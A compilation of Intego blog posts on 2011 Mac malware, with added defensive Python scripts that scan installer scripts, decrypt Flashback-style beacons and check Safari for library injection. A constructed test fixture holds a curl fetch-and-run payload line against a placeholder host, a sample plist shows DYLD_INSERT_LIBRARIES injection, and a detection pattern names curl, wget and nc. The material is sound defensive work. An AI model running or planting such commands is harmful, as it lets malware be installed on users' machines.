
Year in Mac Security 2011


New Malware DevilRobber Grabs Files and Bitcoins, Performs Bitcoin Mining, and More

Intego has discovered a new malware called DevilRobber.A. This malware, which has been found in several applications distributed via BitTorrent trackers, steals data and Bitcoin virtual money, and uses CPU and GPU time on infected Macs to perform “Bitcoin mining.” This malware is complex, and performs many operations. It is a combination of several types of malware: it is a Trojan horse, since it is hidden inside other applications; it is a backdoor, as it opens ports and can accept commands from command and control servers; it is a stealer, as it steals data and Bitcoin virtual money; and it is spyware, as it sends personal data to remote servers. DevilRobber has been found in a small number of Mac applications that are distributed via BitTorrent trackers, including a popular graphics program. When the doctored application is launched, a preflight script looks for Little Snitch, a network traffic blocker; if Little Snitch is found, the program terminates.
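The preflight check described above is something a responder can hunt for directly: the scripts an Installer package runs are plain shell files inside the expanded package. The scanner below is an added example (not Intego's code, and not taken from DevilRobber); it flags a pre/postinstall script that mentions a security product and exits shortly afterwards, and, more generally than this post, a script that pulls content from the network at install time, the install-time payload download that a later Flashback variant on this page uses. It assumes the package was first expanded with `pkgutil --expand Foo.pkg /tmp/foo`; the product list beyond Little Snitch and the sample scripts are constructed for the demo.

```python
"""Scan the install scripts of an expanded macOS package for two behaviours:
a preflight that probes for a security tool and bails out, and a
pre/postinstall that fetches its payload from the network.

Added example, not Intego's code and not the malware's. Assumes the package
was expanded with `pkgutil --expand Foo.pkg /tmp/foo`; the tool names beyond
Little Snitch are assumed additions. The sample scripts are constructed."""
import os
import re
import tempfile

# Scripts an Installer package can run before and after copying files.
SCRIPT_NAMES = ("preflight", "preinstall", "postflight", "postinstall")

# Products a malicious installer might probe for (extend as needed).
SECURITY_TOOLS = ("Little Snitch", "LittleSnitch", "VirusBarrier", "XProtect")

# Commands and URL schemes that indicate install-time fetching of content.
FETCH_RE = re.compile(r"\b(curl|wget|nc|python|perl|osascript)\b|https?://", re.IGNORECASE)
EXIT_RE = re.compile(r"\b(exit|kill|killall)\b")


def scan_script(text):
    """Return human-readable findings for one script body ([] means clean)."""
    findings = []
    tool_hit_at = None  # line number of the most recent security-tool mention
    for n, line in enumerate(text.splitlines(), 1):
        low = line.lower()
        for tool in SECURITY_TOOLS:
            if tool.lower() in low:
                findings.append("line %d: references %s" % (n, tool))
                tool_hit_at = n
        # An exit/kill right after probing for a tool is the
        # "terminate if Little Snitch is present" pattern.
        if tool_hit_at is not None and n - tool_hit_at <= 5 and EXIT_RE.search(line):
            findings.append("line %d: exit/kill within 5 lines of a security-tool check" % n)
            tool_hit_at = None
        if FETCH_RE.search(line):
            findings.append("line %d: network fetch (%s)" % (n, line.strip()[:60]))
    return findings


def scan_expanded_package(root):
    """Walk an expanded package and map each suspicious script to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in SCRIPT_NAMES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_script(fh.read())
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


# ---- constructed samples (not taken from any real package) -----------------
SAMPLE_PREFLIGHT = """#!/bin/sh
# constructed: bail out if the network monitor is installed
if [ -d "/Applications/Little Snitch Configuration.app" ]; then
    exit 1
fi
exit 0
"""

SAMPLE_POSTINSTALL = """#!/bin/sh
# constructed: payload is fetched only at install time
curl -s -o /tmp/.payload http://example.invalid/p && chmod +x /tmp/.payload
/tmp/.payload &
"""

SAMPLE_BENIGN = """#!/bin/sh
rm -rf "/Library/Application Support/ExampleApp/cache"
exit 0
"""


def build_sample_package():
    """Lay out Scripts/preflight and Scripts/postinstall as pkgutil --expand does."""
    root = tempfile.mkdtemp(prefix="pkgscan-")
    scripts = os.path.join(root, "Scripts")
    os.makedirs(scripts)
    for name, body in (("preflight", SAMPLE_PREFLIGHT), ("postinstall", SAMPLE_POSTINSTALL)):
        with open(os.path.join(scripts, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for script, hits in sorted(scan_expanded_package(build_sample_package()).items()):
        print(script)
        for hit in hits:
            print("  ", hit)
```

Run it against a real expanded package with `scan_expanded_package("/tmp/foo")`. The string matching is deliberately loose (a benign uninstall script that kills its own helper will not trip it, but one that names a security product and then exits will), so treat hits as leads to read, not verdicts.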

New Variant of DevilRobber Trojan Found in Three Mac Apps

Intego’s malware researchers have found a new variant of the DevilRobber Trojan horse, which they first discovered in October. The latest variant – DevilRobber.D (there have been two others in between) – has been spotted in three Mac applications distributed via BitTorrent trackers. The applications in question are Writer’s Café, EvoCam and Twitterrific. It is important to note that the original applications, obtained from the developers’ web sites, are not infected; malicious users distribute infected versions via BitTorrent trackers. If you use these applications, and have purchased them from the developers, you have nothing to worry about. In the meantime, VirusBarrier X6 protects against this Trojan horse.

Intego updated its malware definitions to recognize this malware, but the existing malware definitions, for previous variants, already blocked it.

Tsunami Backdoor Can Be Used for Denial of Service Attacks

A new backdoor and hacker tool, Tsunami, has been discovered. This hacker tool seems to be a port of Linux malware that has been around for some time, and provides remote access to attackers by listening on an IRC (Internet Relay Chat) channel for instructions. Tools like this are often used for distributed denial of service (DDoS) attacks (more on that below). These attacks flood computers with standard network requests, with the goal of overloading them. If a server receives more requests than it can handle, it can slow down, or even crash. The Tsunami backdoor accepts a number of commands, and can change servers, download files, such as updates, and send packets to a specified IP address.

Source code for this backdoor has been publicly available since at least September 2009, and it is trivial to compile this code with Apple’s Xcode and create a Mac executable. Individual users generally have little to fear from these tools.

What is a denial of service attack?

OSX/Tsunami Variant Found Dropped by Java 0-Day

A variant of OSX/Tsunami has been found that is rumored to be dropped as a drive-by download by the new Java 0-day exploit, CVE-2012-4681. This method of infection has not yet been confirmed, but as this OS X malware connects out to the same IP address as the Windows backdoors known to be dropped by CVE-2012-4681, it seems they are at least related incidents. At the time of writing, the JAR file that was purported to be dropping this Trojan has been replaced with a bit of threatening text. It seems like maybe someone knows they’ve been discovered? Either way, this means we have two issues: a malware variant has been discovered, and it may be spreading via an unpatched Java exploit.

About the Malware

The Tsunami family was originally a Linux hacker tool (calling itself Kaiten) created in 2002. This variant is an IRC bot like its predecessor.

The Unpatched Java Exploit

It’s important to note that this Java 0-day exploit is only a danger to OS X users if you have installed Java 7.

SECURITY MEMO: Mac Flashback Trojan Horse Masquerades as Flash Player Installer Package

Malware: OSX/flashback.A
Risk: Low; this malware has been found in the wild, and may fool Mac users who don’t have Flash Player installed. However, Intego so far has only one report of this malware, and a sample provided by a user who downloaded it from a malicious web site.

Description: Intego has discovered a new Trojan horse, Flashback, which masquerades as a Flash Player installer. Users visiting certain malicious websites may see a link or an icon to download and install Flash Player. If the user proceeds with the installation procedure, the installer for this Trojan horse will deactivate some network security software (code in this malware specifically targets and deactivates Little Snitch, but has no effect on Intego VirusBarrier X6), and, after installation, will delete the installation package itself.
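The follow-up post below (“More About the Flashback Trojan Horse”) describes the backdoor's channel: RC4, with the key being an MD5 hash of the Mac's hardware UUID, and that same UUID sent as the User-Agent. The script here is an added example, not Intego's analysis tooling and not the malware's code, showing what that scheme means for anyone holding a capture of the traffic. The post does not give byte-level details, so two things are assumptions: the key is the raw 16-byte digest of the UUID string exactly as the User-Agent carries it (`hex_form=True` tries the 32-character hex string instead), and the HTTP body is bare RC4 ciphertext with no framing. The request it decrypts is constructed, not a real capture.

```python
"""Decrypt a Flashback-style beacon whose RC4 key is MD5(hardware UUID).

Added example, not Intego's code and not the malware's. Assumptions: key =
raw MD5 digest of the UUID string as sent in the User-Agent (hex_form=True
uses the hex string instead); body = bare RC4 ciphertext. The request below
is constructed. On a real Mac the UUID is read with:
  ioreg -rd1 -c IOPlatformExpertDevice | grep IOPlatformUUID
"""
import hashlib
import re


def rc4(key, data):
    """Plain RC4: key schedule, then XOR the keystream over data.
    Encrypting and decrypting are the same call."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def key_from_uuid(hw_uuid, hex_form=False):
    """MD5 of the hardware UUID string; raw 16-byte digest by default (assumption)."""
    digest = hashlib.md5(hw_uuid.encode("ascii"))
    return digest.hexdigest().encode("ascii") if hex_form else digest.digest()


# A User-Agent header that is nothing but a UUID (8-4-4-4-12 hex groups).
_UA_UUID = re.compile(
    rb"^User-Agent:[ \t]*([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})[ \t]*\r?$",
    re.MULTILINE)


def decrypt_beacon(raw_request, hex_form=False):
    """Recover the plaintext body of one captured request. The key material
    travels in the same request as the ciphertext, so no secret is needed."""
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker")
    match = _UA_UUID.search(head)
    if not match:
        raise ValueError("no UUID-only User-Agent header")
    hw_uuid = match.group(1).decode("ascii")
    return rc4(key_from_uuid(hw_uuid, hex_form), body)


# ---- constructed sample, standing in for a packet capture ------------------
SAMPLE_UUID = "564D1234-ABCD-EF01-2345-6789ABCDEF01"   # made up
SAMPLE_BODY = b"id=1&os=10.6.8&cmd=none"               # made up


def build_sample_request(hw_uuid=SAMPLE_UUID, body=SAMPLE_BODY):
    """Encrypt the way the backdoor would and wrap it in a minimal POST."""
    ciphertext = rc4(key_from_uuid(hw_uuid), body)
    return (b"POST /beacon HTTP/1.1\r\n"
            + b"Host: example.invalid\r\n"
            + b"User-Agent: " + hw_uuid.encode("ascii") + b"\r\n"
            + b"Content-Length: " + str(len(ciphertext)).encode("ascii") + b"\r\n"
            + b"\r\n" + ciphertext)


if __name__ == "__main__":
    print(decrypt_beacon(build_sample_request()))
```

The point for a responder: because the key is derived only from an identifier that the same request sends in the clear, this encryption hides the traffic from casual inspection but gives no confidentiality against anyone with a capture, and a proxy or IDS that sees the User-Agent can decrypt every beacon from that host. If the raw-digest assumption turns out wrong for a given sample, the `hex_form` switch is the first thing to try.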

For now, Intego has analyzed this malware and its installation process.

More About the Flashback Trojan Horse

Intego’s security researchers have been examining the code of this new Trojan horse, which we announced yesterday. They have found some interesting elements in the code. First, the code itself is quite sophisticated. The Trojan horse installs a backdoor, at ~/Library/Preferences/Preferences.dylib, which communicates with a remote server, sending and receiving data using RC4 encryption. The backdoor uses the infected Mac’s hardware UUID (a unique identifier) as a user agent, and to identify specific computers. The encryption key used is an MD5 hash of the infected Mac’s UUID. The backdoor is able to download further software, but, for now, we are not seeing this activity.

Flashback Trojan Spreading; Mac Users Should Be Wary of Flash Installers

Following our recent security memo about the Mac Flashback Trojan horse, Intego has seen an increase in the number of Mac users infected by this malware. After publicizing this threat, many users have posted, both in the comments on this blog and on other blogs and forums, about having either seen this malware download or actually installed it. If you end up on a site that is serving this malware, you will see something similar to this: the first things you see are the crashed-plugin graphic and the purported error messages. After this, the fake Adobe Flash installer screen pops up, and then the Flashback Trojan horse installation package downloads. At this point, if you have the default Safari settings – which allow “safe” downloads to open automatically – you will see an Installer window open.

This is effective social engineering. For these reasons, Intego is raising the risk level of this malware to medium.

New Variant of Flashback Trojan Horse Gets Sneakier

We’ve seen several variants of the Flashback Trojan horse since Intego first discovered this malware on September 26. The latest version, Flashback.D, has gotten a bit sneakier. First, it checks to see if the user is running Mac OS X in VMware Fusion. If so, it does not execute. It does this because many malware researchers test malware in virtual machines, rather than infect full installations, as it is easier to delete them and start over with clean copies. This means that security researchers analyzing and looking for this malware need to be running regular Macs. Next, the installer for the malware downloads the payload when running the postinstall script. Finally, it no longer installs the easy-to-spot ~/Library/Preferences/Preferences.dylib.

Even if a user removes the above file (UnHackMeBuild), they need to edit Safari’s Info.plist file; if not, Safari will look for the backdoor on launch, and, if it is not found, Safari will quit.

Flashback Trojan Horse: New Variants with New Features

A security firm has published some information on a new variant of the Flashback Trojan horse, which Intego discovered in September. This new variant, which they are calling Flashback.C, is the variant that Intego spotted a week ago, Flashback.D. (It’s not uncommon for different security companies to name variants differently; we may have more variants than other companies.)
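The Safari Info.plist edit mentioned above is the persistence point a responder has to find and undo, and the post does not say which key the malware writes. The check below is an added example (not Intego's code) that therefore does not depend on one key: it flags any `LSEnvironment` dictionary in the bundle's Info.plist (environment variables Launch Services applies to the app, where a `DYLD_*` variable can make the dynamic linker load an extra library), and any string anywhere in the plist that names a `.dylib`. The two plists it runs on are constructed samples; the path to Safari's real Info.plist is the standard one.

```python
"""Look for an injected library reference in a browser's Info.plist.

Added example, not Intego's code. Flags any LSEnvironment entry (DYLD_*
ones especially) and any .dylib path anywhere in the plist, rather than
relying on one specific key the post does not name. Samples are constructed."""
import os
import plistlib

SAFARI_INFO = "/Applications/Safari.app/Contents/Info.plist"


def _leaves(node, path=""):
    """Yield (key path, value) for every scalar in a parsed plist."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _leaves(value, path + "/" + key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _leaves(value, "%s[%d]" % (path, i))
    else:
        yield path, node


def find_injection(plist_bytes):
    """Return findings for one Info.plist (XML or binary); [] means nothing found."""
    info = plistlib.loads(plist_bytes)
    findings = []
    env = info.get("LSEnvironment")
    if isinstance(env, dict):
        for var, value in env.items():
            kind = "dynamic-linker injection" if var.startswith("DYLD_") else "environment override"
            findings.append("LSEnvironment sets %s=%r (%s)" % (var, value, kind))
    for path, value in _leaves(info):
        if path.startswith("/LSEnvironment/"):
            continue  # already reported above
        if isinstance(value, str) and value.lower().endswith(".dylib"):
            findings.append("%s names a library: %s" % (path, value))
    return findings


def scan_installed(path=SAFARI_INFO):
    """Scan the real Safari bundle; returns None when the file is not there."""
    if not os.path.exists(path):
        return None
    with open(path, "rb") as fh:
        return find_injection(fh.read())


# ---- constructed samples --------------------------------------------------
CLEAN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key><string>com.apple.Safari</string>
  <key>CFBundleExecutable</key><string>Safari</string>
</dict>
</plist>
"""

INFECTED_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key><string>com.apple.Safari</string>
  <key>CFBundleExecutable</key><string>Safari</string>
  <key>LSEnvironment</key>
  <dict>
    <key>DYLD_INSERT_LIBRARIES</key>
    <string>/Users/victim/Library/Preferences/Preferences.dylib</string>
  </dict>
</dict>
</plist>
"""

if __name__ == "__main__":
    print("clean sample:", find_injection(CLEAN_PLIST))
    print("infected sample:", find_injection(INFECTED_PLIST))
    print("this machine:", scan_installed())
```

A `DYLD_INSERT_LIBRARIES` entry pointing at a file that no longer exists makes the dynamic linker abort the process at launch, which is the "Safari will quit" symptom the post describes, so the plist entry has to go along with the library. The same check applies to Firefox's bundle, which the next post says the manual removal instructions also cover.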

Some of the information published about this variant is interesting, notably the fact that it can disable Apple’s XProtect malware detection system. Some companies have published instructions for manually removing this malware, but it is important to note that such instructions only discuss removing code added to the Safari or Firefox web browsers; given the damage done to the XProtect system, manual repair is impossible. This is the first malware affecting Mac OS X that we have seen that intentionally damages system files.

The Flashback Trojan Horse Is Not Taking Time Off for the Holidays
Microsoft “Discovers” Mac Backdoor Olyx; Intego Found it Last Month

Security Memo – MAC Defender Fake Antivirus Program Targets Mac Users

Malware: OSX/MacDefender.A
Risk: Low; in the wild, but not very widespread for now
Description: Intego has discovered a fake antivirus program called MAC Defender, which targets Mac users via SEO poisoning attacks (web sites set up to take advantage of search engine optimization tricks to get malicious sites to appear at the top of search results).

When a user clicks on certain links after performing a search on a search engine such as Google, they are sent to a web site that displays a fake Windows screen with an animated image showing a malware scan; a window then tells the user that their computer is infected. After this, JavaScript on the page automatically downloads a file. The file downloaded is a compressed ZIP archive, which, if a specific option in a web browser is checked (“Open ‘safe’ files after downloading” in Safari, for example), will open. If the user continues through the installation process, and enters an administrator’s password, the software will be installed.

MAC Defender Rogue Anti-Malware Program Attacks Macs via SEO Poisoning

UPDATE: See Intego’s full security memo with detailed information about the MAC Defender fake antivirus. Intego has discovered a rogue anti-malware program called MACDefender, which attacks Macs via SEO poisoning attacks.

When a user clicks on a link after performing a search on a search engine such as Google, this takes them to a web site whose page contains JavaScript that automatically downloads a file. In this case, the file downloaded is a compressed ZIP archive, which, if a specific option in a web browser is checked (“Open ‘safe’ files after downloading” in Safari, for example), will open. The file is decompressed, and the installer it contains launches, presenting the user with an installation screen. If the user continues through the installation process, and enters an administrator’s password, the software will be installed.
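Both the Flashback and the MAC Defender chains on this page lean on the same Safari option, “Open ‘safe’ files after downloading”, to get an Installer window in front of the user without a click. The script below is an added example (not Intego's or Apple's code) that audits and, with `--fix`, disables it. It relies on two facts: the option is stored as the boolean `AutoOpenSafeDownloads` in the `com.apple.Safari` defaults domain, and an absent key means the factory default, which is enabled. The output-interpreting function is kept separate from the `defaults` calls so it can be exercised off a Mac; the strings fed to it in testing are constructed.

```python
"""Audit and optionally disable Safari's "Open 'safe' files after downloading".

Added example, not Intego's or Apple's code. Relies on the setting living at
com.apple.Safari / AutoOpenSafeDownloads (boolean) and defaulting to enabled
when the key is absent. Sample `defaults read` outputs are constructed."""
import platform
import subprocess

DOMAIN = "com.apple.Safari"
KEY = "AutoOpenSafeDownloads"


def auto_open_enabled(defaults_output):
    """Interpret the text `defaults read` printed. Empty means the key is
    absent, which leaves the factory default (enabled) in force."""
    value = defaults_output.strip().lower()
    if value == "":
        return True
    if value in ("1", "true", "yes"):
        return True
    if value in ("0", "false", "no"):
        return False
    raise ValueError("unrecognised defaults output: %r" % defaults_output)


def read_setting():
    """Run `defaults read`; a missing key exits non-zero, which maps to ''."""
    proc = subprocess.run(["defaults", "read", DOMAIN, KEY],
                          capture_output=True, text=True, check=False)
    return proc.stdout if proc.returncode == 0 else ""


def disable_auto_open():
    """Write the hardened value; Safari picks it up on its next launch."""
    subprocess.run(["defaults", "write", DOMAIN, KEY, "-bool", "false"], check=True)


def audit(fix=False):
    """Return 'enabled', 'disabled' or 'not-macos'; with fix=True, disable it."""
    if platform.system() != "Darwin":
        return "not-macos"
    if not auto_open_enabled(read_setting()):
        return "disabled"
    if fix:
        disable_auto_open()
        return "disabled"
    return "enabled"


if __name__ == "__main__":
    import sys
    print(audit(fix="--fix" in sys.argv))
```

Turning the option off does not stop the ZIP or package from being downloaded; it only stops the Installer or Archive Utility from launching on its own, which puts the decision back in the user's hands, where the admin-password prompt the posts describe is the last line of defense.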

It is important that users not continue with any unexpected installation of this type.

How SEO Poisoning Works and Why You Should Care

In this week’s report of the MacDefender fake antivirus program, we mentioned how this fake antivirus is delivered to users by way of SEO poisoning techniques. In an article on Krebs on Security, journalist Brian Krebs gives some detailed information on how SEO poisoning works, and why it works so well. One of the main targets of SEO poisoning is Google Image search. In part this is because it is harder to trick out a full web page and get it to appear high in Google’s search results than it is to get images high in the list. Once a user clicks on a thumbnail in the Google Image search results, this sets off the malicious code that can lead to malware being delivered (or, potentially, other types of attacks).

Russian malware researcher Denis Sinegubko goes much deeper into the techniques used in this SEO poisoning, and says: “I would call this the most efficient and easy to implement black hat SEO trick to drive search traffic to a site.”

Who’s Behind the Fake Antiviruses Targeting Mac Users?

With yet another version of the Mac Defender fake antivirus discovered, one may wonder who is behind this rash of attacks targeting Mac users. Microsoft published an analysis of the malware and the URLs it uses and suggests it is created by the “Winwebsec” gang. They noted the similarity between web pages used to collect credit card numbers.

And, they also said, “In addition to using similar UIs, we noticed that they even share the same payment gateway (this is the site where users are duped into giving the criminals their credit card information). Simply changing the file name from ‘buy.php’ to ‘mac.php’ causes the ‘branding’ to change from the Windows version to the Mac version…” Journalist Brian Krebs, in an article on his Krebs on Security blog, claims that ChronoPay, “Russia’s largest online payment processor and something of a pioneer in the rogue anti-virus business,” is involved in this scamware.

AppleCare Overwhelmed by Calls About Fake Antivirus

With the MacDefender, MacSecurity and MacProtector fake antivirus spreading through poisoned Google Images searches, more and more Mac users are getting stung by this scam. Ed Bott on ZDNet spoke to an AppleCare representative who explained just how widespread this is.

He says, “Our call volume here at AppleCare is 4-5x higher than normal and [the overwhelming majority] of our calls are about this Mac Defender and its aliases.” Our information at Intego is similar. We are contacted by a huge number of customers who are worried about this fake antivirus, and have dozens of samples, including a number of variants of the scareware. Remember, think twice when you enter your administrator’s password, and protect yourself from this and the many other dangers of the Internet with VirusBarrier X6.

Tens of Thousands of Mac Users Scammed by Fake Antivirus

Apple Offers Instructions for Removal for Mac Defender Fake Antivirus

Apple has published a technical note regarding the MacDefender (and MacProtector and MacSecurity) fake antivirus, called How to avoid or remove Mac Defender malware. This document explains how to find and remove the fake antivirus, and Apple states that “In the coming days, Apple will deliver a Mac OS X software update that will automatically find and remove Mac Defender malware and its known variants. The update will also help protect users by providing an explicit warning if they download this malware.” Apple is to be commended for publishing this document, but we have two comments to make. Intego first discovered the Mac Defender fake antivirus on May 2, 2011.

Comment Moderator for Popular Blog Shilling for Malware Creators?
Apple Issues MacDefender Security Update
New MacDefender Variant Evades Apple’s Malware Detection System
Apple Updates XProtect Malware Definitions for Latest MacDefender Variant
Discovers New Variants of Mac Defender Fake Antivirus
MacDefender / MacSecurity Malware Gets a Bit More Sophisticated
MacDefender, MacSecurity, now MacProtector: Latest Version of Fake Antivirus Targeting Mac Users
SECURITY MEMO – New Mac Defender Variant, MacGuard, Doesn’t Require Password for Installation

MacDefender Changes Name Again: Now MacShield
BlackHole RAT is Really No Big Deal
Discovers New, Improved BlackHole RAT Variant
BlackHole RAT Evolves Again: New Variant Found